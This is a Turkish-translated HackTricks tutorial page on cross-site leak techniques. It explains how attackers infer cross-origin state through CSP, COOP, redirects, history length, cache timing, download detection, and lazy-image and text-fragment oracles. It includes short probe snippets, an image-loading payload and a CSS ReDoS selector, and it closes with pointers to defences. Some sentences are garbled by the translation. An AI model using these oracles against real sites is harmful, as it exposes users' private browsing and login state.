Google Chrome'da (GC) yeni bir özellik, bir iframe öğesinde bir öznitelik ayarlayarak web sayfalarının Bir İçerik Güvenlik Politikası (CSP) önermesine izin verir ve politika yönergeleri HTTP isteği ile iletilir. Genellikle, gömülü içerik bunu bir HTTP başlığı aracılığıyla yetkilendirmelidir, aksi takdirde bir hata sayfası görüntülenir. Ancak, eğer iframe zaten bir CSP tarafından yönetiliyorsa ve yeni önerilen politika daha kısıtlayıcı değilse, sayfa normal şekilde yüklenecektir. Bu mekanizma, bir saldırganın çapraz kökenli bir sayfanın belirli CSP yönergelerini belirlemesine olanak tanır ve hata sayfasını tanımlayabilir. Bu zayıflık düzeltilmiş olarak işaretlendi, ancak bulgularımız, hata sayfasını tespit edebilen yeni bir sızıntı tekniğini ortaya koyarak, temel sorunun asla tam olarak ele alınmadığını göstermektedir.

CORP

CORP başlığı, belirli bir kaynağa no-cors çapraz kökenli istekleri engellediğinde bir hata fırlatacak olan nispeten yeni bir web platformu güvenlik özelliğidir. Başlığın varlığı algılanabilir, çünkü CORP ile korunan bir kaynağa erişildiğinde bir hata fırlatır.

CORB

Saldırı hakkında daha fazla bilgi için bağlantıya bakın.

CORS error on Origin Reflection misconfiguration

Eğer Origin başlığı, Access-Control-Allow-Origin başlığında yansıtılıyorsa, bir saldırgan bu davranışı kötüye kullanarak CORS modunda kaynağı almayı deneyebilir. Eğer bir hata oluşmazsa, bu, kaynağın web'den doğru şekilde alındığı anlamına gelir, eğer bir hata oluşursa, bu, kaynağın önbellekten alındığı anlamına gelir (hata, önbelleğin, orijinal alanı izin veren bir CORS başlığıyla bir yanıtı kaydettiği için ortaya çıkar).
Unutulmamalıdır ki, eğer köken yansıtılmıyorsa ancak joker karakteri kullanılıyorsa (Access-Control-Allow-Origin: *), bu çalışmaz.

Okunabilir Öznitelik Tekniği

Fetch Yönlendirmesi

redirect: "manual" ve diğer parametrelerle Fetch API kullanarak bir istek göndererek, response.type özniteliğini okumak ve eğer bu opaqueredirect'e eşitse, yanıtın bir yönlendirme olduğunu belirlemek mümkündür.

COOP

  • Dahil Etme Yöntemleri: Açılır Pencereler
  • Algılanabilir Fark: Başlık
  • Daha Fazla Bilgi: Makale (5.4), Pencere Referanslarına Saldırılar
  • Özet: Cross-Origin Opener Policy (COOP) tarafından korunan sayfalar, çapraz köken etkileşimlerden erişimi engeller.
  • Kod Örneği: COOP Sızıntısı

Bir saldırgan, çapraz köken HTTP yanıtında Cross-Origin Opener Policy (COOP) başlığının varlığını çıkarabilir. COOP, web uygulamaları tarafından harici sitelerin rastgele pencere referanslarına erişmesini engellemek için kullanılır. Bu başlığın görünürlüğü, contentWindow referansına erişmeye çalışarak anlaşılabilir. COOP koşullu olarak uygulandığında, opener özelliği belirleyici bir gösterge haline gelir: COOP aktif olduğunda tanımsız olurken, yokluğunda tanımlı olur.

URL Maksimum Uzunluğu - Sunucu Tarafı

  • Dahil Etme Yöntemleri: Fetch API, HTML Elemanları
  • Algılanabilir Fark: Durum Kodu / İçerik
  • Daha Fazla Bilgi: Sunucu tarafı yönlendirmeleri
  • Özet: Sunucu tarafından verilen yönlendirme yanıtlarındaki farklılıkları algılamak, çünkü yanıtın uzunluğu, sunucunun bir hata ile yanıt vermesine ve bir uyarı oluşturulmasına neden olabilir.
  • Kod Örneği: URL Maksimum Uzunluğu Sızıntısı

Eğer bir sunucu tarafı yönlendirmesi, yönlendirme içinde kullanıcı girdisi ve ekstra veri kullanıyorsa, bu davranışı tespit etmek mümkündür çünkü genellikle sunucuların bir istek uzunluğu sınırı vardır. Eğer kullanıcı verisi bu uzunluk - 1 ise, çünkü yönlendirme bu veriyi kullanıyor ve ekstra bir şey ekliyorsa, bir hata Error Events aracılığıyla algılanabilir.

Eğer bir kullanıcıya çerezler atayabilirseniz, bu saldırıyı yeterli çerez atayarak da gerçekleştirebilirsiniz (çerez bombası), böylece doğru yanıtın boyutu arttığında bir hata tetiklenir. Bu durumda, bu isteği aynı siteden tetiklerseniz, <script> otomatik olarak çerezleri gönderir (bu nedenle hataları kontrol edebilirsiniz).
Çerez bombası + XS-Search'ün bir örneği, bu yazının amaçlanan çözümünde bulunabilir: amaçlanan

Bu tür bir saldırı için genellikle SameSite=None veya aynı bağlamda olmak gereklidir.

URL Maksimum Uzunluğu - İstemci Tarafı

  • Dahil Etme Yöntemleri: Açılır Pencereler
  • Algılanabilir Fark: Durum Kodu / İçerik
  • Daha Fazla Bilgi: Chrom'un 2MB URL sınırı
  • Özet: Yanıtın uzunluğundan dolayı farklılıkları algılamak, istek için yanıtın çok büyük olması durumunda fark edilebilecek bir fark olabilir.
  • Kod Örneği: Chrom'un 2MB URL sınırı

Chromium belgelerine göre, Chrome'un maksimum URL uzunluğu 2MB'dir.

Genel olarak, web platformu URL'lerin uzunluğuna sınırlama getirmez (ancak 2^31 yaygın bir sınırdır). Chrome, uygulama arasında hizmet dışı bırakma sorunlarına neden olmamak ve pratik nedenlerle URL'leri maksimum 2MB uzunluğunda sınırlar.

Bu nedenle, eğer yönlendirme URL'si bir durumda daha büyükse, URL'nin 2MB'den büyük bir uzunluğa sahip olacak şekilde yönlendirilmesi mümkündür. Bu gerçekleştiğinde, Chrome bir about:blank#blocked sayfası gösterir.

Fark edilebilir fark, eğer yönlendirme tamamlandıysa, window.origin bir hata fırlatır çünkü çapraz köken bu bilgiye erişemez. Ancak, limitıldığında ve yüklenen sayfa about:blank#blocked ise pencerenin origin'i ana sayfanınki olarak kalır, bu da erişilebilir bir bilgidir.

2MB'ye ulaşmak için gereken tüm ek bilgiler, başlangıçtaki URL'de bir hash ile eklenerek yönlendirmede kullanılabilir hale getirilebilir.

{% content-ref url="xs-search/url-max-length-client-side.md" %} url-max-length-client-side.md {% endcontent-ref %}

Maksimum Yönlendirmeler

Eğer bir tarayıcının takip edeceği maksimum yönlendirme sayısı 20 ise, bir saldırgan sayfasını 19 yönlendirme ile yüklemeyi deneyebilir ve sonunda kurbanı test edilen sayfaya yönlendirebilir. Eğer bir hata tetiklenirse, o zaman sayfa kurbanı yönlendirmeye çalışıyordu.

Geçmiş Uzunluğu

Geçmiş API JavaScript koduna tarayıcı geçmişini manipüle etme izni verir, bu da bir kullanıcının ziyaret ettiği sayfaları kaydeder. Bir saldırgan uzunluk özelliğini dahil etme yöntemi olarak kullanabilir: JavaScript ve HTML gezinmesini algılamak için.
history.length kontrol edilirken, bir kullanıcının bir sayfaya gezinmesi, onu aynı kök dizine geri dön ve history.length'in yeni değerini kontrol etmek.

Aynı URL ile Geçmiş Uzunluğu

  • Dahil Etme Yöntemleri: Çerçeveler, Açılır Pencereler
  • Algılanabilir Fark: URL'nin tahmin edilenle aynı olup olmadığı
  • Özet: Geçmiş uzunluğunu kötüye kullanarak bir çerçeve/açılır pencerenin belirli bir URL'de olup olmadığını tahmin etmek mümkündür.
  • Kod Örneği: Aşağıda

Bir saldırgan JavaScript kodunu kullanarak çerçeve/açılır pencerenin konumunu tahmin edilen bir URL'ye manipüle edebilir ve hemen about:blank'e değiştirebilir. Eğer geçmiş uzunluğu artarsa, bu URL'nin doğru olduğunu ve artma zamanı olduğunu gösterir çünkü URL aynı ise yeniden yüklenmez. Eğer artmazsa, bu tahmin edilen URL'yi yüklemeye çalıştığını ve çünkü hemen sonra about:blank'i yüklediğimizden, geçmiş uzunluğunun tahmin edilen URL'yi yüklerken hiç artmadığını gösterir.

async function debug(win, url) {
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
}

win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));

win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));

Kare Sayımı

Bir web sayfasındaki iframe veya window.open ile açılan kare sayısını saymak, kullanıcının o sayfadaki durumunu belirlemeye yardımcı olabilir.
Ayrıca, sayfada her zaman aynı sayıda kare varsa, kare sayısını sürekli olarak kontrol etmek, sızdırılabilecek bilgileri belirlemeye yardımcı olabilir.

Bu teknikte bir örnek olarak, Chrome'da bir PDF, içsel olarak bir embed kullanıldığı için kare sayımı ile tespit edilebilir. zoom, view, page, toolbar gibi bazı kontrol sağlayan ık URL Parametreleri bulunmaktadır, bu teknik ilginç olabilir.

HTMLElements

HTML öğeleri aracılığıyla bilgi sızıntısı, özellikle dinamik medya dosyalarının kullanıcı bilgilerine dayalı olarak oluşturulduğu veya filigranların eklendiği durumlarda web güvenliğinde endişe yaratır. Bu, saldırganların belirli HTML öğeleri tarafından açığa çıkarılan bilgileri analiz ederek olası durumlar arasında ayrım yapmalarını sağlayabilir.

HTML Öğeleri Tarafından Açığa Çıkarılan Bilgiler

CSS Özelliği

Web uygulamaları, kullanıcının durumuna bağlı olarak web sitesi stilini değiştirebilir. Saldırgan sayfasına HTML link öğesi ile gömülen çapraz kökenli CSS dosyaları ve kurallar saldırgan sayfasına uygulanır. Bir sayfa bu kuralları dinamik olarak değiştiriyorsa, bir saldırgan bu farkları kullanıcı durumuna bağlı olarak algılayabilir.
Bir sızıntı tekniği olarak, saldırgan belirli bir HTML öğesinin CSS özelliklerini okumak için window.getComputedStyle yöntemini kullanabilir. Sonuç olarak, etkilenen öğe ve özellik adı biliniyorsa, bir saldırgan keyfi CSS özelliklerini okuyabilir.

CSS Geçmişi

{% hint style="info" %} Buna göre, bu headless Chrome'da çalışmıyor. {% endhint %}

CSS :visited seçicisi, kullanıcı tarafından daha önce ziyaret edilmiş URL'leri farklı şekilde biçimlendirmek için kullanılır. Geçmişte, getComputedStyle() yöntemi bu stil farklarını belirlemek için kullanılabilirdi. Ancak, modern tarayıcılar, bu yöntemin bir bağlantının durumunu ortaya çıkarmasını önlemek için güvenlik önlemleri uygulamıştır. Bu önlemler, her zaman bağlantının ziyaret edilmiş gibi hesaplanmış stilini döndürmek ve :visited seçicisi ile uygulanabilecek stilleri kısıtlamak içerir.

Bu kısıtlamalara rağmen, bir bağlantının ziyaret edilmiş durumunu dolaylı olarak belirlemek mümkündür. Bir teknik, kullanıcıyı CSS'den etkilenen bir alanla etkileşime sokarak, özellikle mix-blend-mode özelliğini kullanarak kullanıcı etkileşimine dayanarak ziyaret edilmiş durumu ortaya çıkarabilir. Bu özellik, öğelerin arka planlarıyla karıştırılmasına izin verir ve kullanıcı etkileşimine dayanarak ziyaret edilmiş durumu ortaya çıkarabilir.

Ayrıca, kullanıcı etkileşimi olmadan bağlantıların render zamanlamalarını sömürerek algılama sağlanabilir. Tarayıcılar ziyaret edilen ve ziyaret edilmemiş bağlantıları farklı şekilde render edebileceğinden, bu, render etmede ölçülebilir bir zaman farkı oluşturabilir. Bu tekniği, ziyaret edilmiş durumu zamanlama analizi yoluyla algılanabilir hale getirmek için birden fazla bağlantı kullanarak gösteren bir kanıt konsepti (PoC), bir Chromium hata raporunda belirtildi.

Bu özellikler ve yöntemler hakkında daha fazla ayrıntı için belgelerine göz atın:

ContentDocument X-Frame Leak

Chrome'da, X-Frame-Options başlığı "deny" veya "same-origin" olarak ayarlanmış bir sayfa bir nesne olarak gömülüyorsa, bir hata sayfası görünür. Chrome, bu nesnenin contentDocument özelliği için diğer tarayıcılardan farklı olarak boş bir belge nesnesi (null yerine) döndürür. Saldırganlar, boş belgeyi algılayarak, özellikle geliştiriciler X-Frame-Options başlığını tutarsız bir şekilde ayarladıklarında, genellikle hata sayfalarını göz ardı ettiklerinde, kullanıcının durumu hakkında bilgi açığa çıkarabilir. Bu tür sızıntıları önlemek için güvenlik başlıklarının farkında olunması ve tutarlı bir şekilde uygulanması önemlidir.

İndirme Tespiti

Content-Disposition başlığı, özellikle Content-Disposition: attachment, tarayıcıya içeriği görüntülemek yerine indirmesini talimat verir. Bu davranış, bir kullanıcının bir dosya indirme tetikleyen bir sayfaya erişiminin olup olmadığını tespit etmek için sömürülebilir. Chromium tabanlı tarayıcılarda, bu indirme davranışını tespit etmek için birkaç teknik bulunmaktadır:

  1. İndirme Çubuğu İzleme:
  • Bir dosya Chromium tabanlı tarayıcılarda indirildiğinde, tarayıcı penceresinin altında bir indirme çubuğu görünür.
  • Saldırganlar, pencere yüksekliğindeki değişiklikleri izleyerek, indirme çubuğunun görünümünü çıkarımlayabilir ve bir indirme başlatıldığını öne sürebilir.
  1. İframelerle İndirme Navigasyonu:
  • Bir sayfa, Content-Disposition: attachment başlığını kullanarak bir dosya indirme tetiklediğinde, bir navigasyon olayına neden olmaz.
  • İçeriği bir iframede yükleyerek ve navigasyon olaylarını izleyerek, içerik dağıtımının bir dosya indirmesine neden olup olmadığını kontrol etmek mümkündür (navigasyon olmaz).
  1. İframeler Olmadan İndirme Navigasyonu:
  • İframe tekniğiyle benzer şekilde, bu yöntem bir iframe yerine window.open kullanımını içerir.
  • Yeni açılan pencerede navigasyon olaylarını izleyerek, bir dosya indirme tetiklenip tetiklenmediğini (navigasyon olmadığı) veya içeriğin içeride görüntülendiğini belirlemek mümkündür (navigasyon gerçekleşir).

Yalnızca giriş yapmış kullanıcıların bu tür indirmeleri tetikleyebildiği senaryolarda, bu teknikler, tarayıcının indirme isteğine verdiği yanıta dayanarak dolaylı olarak kullanıcının kimlik doğrulama durumunu çıkarmak için kullanılabilir.

Bölümlenmiş HTTP Önbellek Atlatma

{% hint style="warning" %} Bu teknik neden ilginç: Chrome artık önbellek bölümlendirmesine sahip ve yeni açılan sayfanın önbellek anahtarı şudur: (https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m =xxx), ancak bir ngrok sayfası açarsam ve içinde fetch kullanırsam, önbellek anahtarı şu olacaktır: (https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx), önbellek anahtarı farklıdır, bu nedenle önbellek paylaşılamaz. Daha fazla ayrıntıya buradan ulaşabilirsiniz.
(Yorum buradan) {% endhint %}

Eğer bir site example.com, *.example.com/resource kaynağını içeriyorsa, o kaynak, kaynağın doğrudan üst düzey gezinme ile istendiği gibi aynı önbellekleme anahtarına sahip olacaktır. Bu, önbelleğe erişmenin bir kaynağı yüklemekten daha hızlı olduğu için, bir sayfanın konumunu değiştirmeye çalışabilir ve 20ms (örneğin) sonra bunu iptal edebilir. Eğer durdurmadan sonra köken değiştiyse, kaynağın önbelleğe alındığı anlamına gelir.
Ya da sadece potansiyel olarak önbelleğe alınmış sayfaya bazı fetch gönderebilir ve alınan zamanı ölçebilirsiniz.

Manuel Yönlendirme

AbortController ile Fetch

Yeni içerik önbelleğe alınmadan belirli bir kaynağı tarayıcı önbelleğinden çıkarmak ve aynı zamanda kaynağın önbelleğe alınıp alınmadığını tespit etmek için fetch ve setTimeout kullanın. Ayrıca, yeni içerik önbelleğe alınmadan işlem gerçekleşir.

Komut Kirliliği

Hizmet İşçileri

Verilen senaryoda, saldırgan, özellikle "attacker.com" alanlarından birinde bir hizmet işçisi kaydetme girişiminde bulunur. Sonrasında, saldırgan hedef web sitesindeki ana belgeden yeni bir pencere açar ve hizmet işçisine bir zamanlayıcı başlatmasını talimat verir. Yeni pencere yüklenmeye başladığında, saldırgan önceki adımda elde edilen referansı hizmet işçisi tarafından yönetilen bir sayfaya yönlendirir.

Önceki adımda başlatılan isteğin varışı sırasında, hizmet işçisi etkin bir şekilde navigasyon sürecini sonlandıran bir 204 (İçerik Yok) durum kodu ile yanıt verir. Bu noktada, hizmet işçisi önceki adımda başlatılan zamanlayıcıdan bir ölçüm yakalar. Bu ölçüm, navigasyon sürecinde gecikmelere neden olan JavaScript'in süresinden etkilenir.

{% hint style="warning" %} Bir yürütme zamanlamasında ağ faktörlerini ortadan kaldırmak ve daha kesin ölçümler elde etmek mümkündür. Örneğin, sayfanın yüklenmeden önce kullandığı kaynakları yükleyerek. {% endhint %}

Getirme Zamanlaması

Çapraz-Pencere Zamanlaması


Trickest kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Alın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

HTML veya Yeniden Enjeksiyon ile

Burada, bir çapraz kaynaktan HTML'den bilgi sızdırmak için teknikler bulabilirsiniz. Bu teknikler, herhangi bir nedenle HTML enjekte edebilir ancak JS kodu enjekte edemezseniz ilginç olabilir.

Sarkan İşaretleme

{% content-ref url="dangling-markup-html-scriptless-injection/" %} dangling-markup-html-scriptless-injection {% endcontent-ref %}

Görüntü Tembel Yükleme

Eğer içerik sızdırmak ve gizli öncesi HTML ekleyebiliyorsanız, ortak sarkan işaretleme tekniklerini kontrol etmelisiniz.
Ancak, herhangi bir nedenden dolayı bunu her karakter için yapmalısınız (belki iletişim önbellek vuruşu yoluyla ise) bu hileyi kullanabilirsiniz.

HTML'deki Görüntülerin bir "yükleniyor" özniteliği vardır ve değeri "tembel" olabilir. Bu durumda, görüntü yalnızca görüntülendiğinde yüklenecek ve sayfa yüklenirken değil:

<img src=/something loading=lazy >

Bu nedenle yapabileceğiniz şey, web sayfasını gizli içerikten önce doldurmak için çok sayıda gereksiz karakter eklemektir (Örneğin binlerce "W" gibi) veya şuna benzer bir şey eklemektir <br><canvas height="1850px"></canvas><br>.
Sonra örneğin enjeksiyonumuz bayrağın önünde görünüyorsa, resim yüklenecektir, ancak bayraktan sonra görünüyorsa, bayrak + gereksiz karakterler, yüklenmesini engelleyecektir (ne kadar gereksiz karakter yerleştireceğinizle oynamanız gerekecektir). Bu, bu yazıda yaşanan durumdur.

Başka bir seçenek, izin veriliyorsa scroll-to-text-fragment'i kullanmaktır:

Scroll-to-text-fragment

Ancak, botun sayfaya erişmesini sağlarsınız gibi bir şey yapabilirsiniz.

#:~:text=SECR

Web sayfası şöyle olacak: https://victim.com/post.html#:~:text=SECR

Burada post.html saldırganın gereksiz karakterleri ve tembel yükleme görüntüsünü içerir ve ardından botun sırrı eklenir.

Bu metin, botun sayfadaki SECR metnini içeren herhangi bir metne erişmesini sağlayacak. Çünkü bu metin sır ve görüntünün hemen altında olduğu için, görüntü yalnızca doğru tahmin edilen sır olduğunda yüklenecek. Bu şekilde, sırrı her karakteri sırayla dışarı sızdırmanızı sağlayacak bir oracle elde etmiş olursunuz.

Bunu sömürmek için bazı kod örnekleri: https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e

Görüntü Tembel Yükleme Zaman Tabanlı

Eğer harici bir görüntü yüklemek mümkün değilse ve bu durum saldırganın görüntünün yüklendiğini göstermesi gerekiyorsa, başka bir seçenek birkaç kez karakter tahmin etmeye çalışmak ve bunu ölçmektir. Eğer görüntü yüklendiyse, tüm isteklerin yüklenmesi, görüntünün yüklenmediği durumdan daha uzun sürecektir. Bu, bu yazının çözümünde kullanılan şeydir:

{% content-ref url="xs-search/event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}

ReDoS

{% content-ref url="regular-expression-denial-of-service-redos.md" %} regular-expression-denial-of-service-redos.md {% endcontent-ref %}

CSS ReDoS

Eğer jQuery(location.hash) kullanılıyorsa, bazı HTML içeriğinin varlığını zamanlama ile tespit etmek mümkündür, çünkü eğer seçici main[id='site-main'] eşleşmiyorsa, geri kalan seçicileri kontrol etmesine gerek yoktur:

$("*:has(*:has(*:has(*)) *:has(*:has(*:has(*))) *:has(*:has(*:has(*)))) main[id='site-main']")

CSS Enjeksiyonu

{% content-ref url="xs-search/css-injection/" %} css-injection {% endcontent-ref %}

Savunmalar

https://xsinator.com/paper.pdf adresinde önerilen önlemler bulunmaktadır ve her bölümde https://xsleaks.dev/ wiki sayfasında da korunma teknikleri hakkında daha fazla bilgi bulabilirsiniz.

Referanslar

Sıfırdan Kahraman'a AWS hackleme öğrenin htARTE (HackTricks AWS Red Team Expert)!

HackTricks'ı desteklemenin diğer yolları:


Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.
Bugün Erişim Sağlayın:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}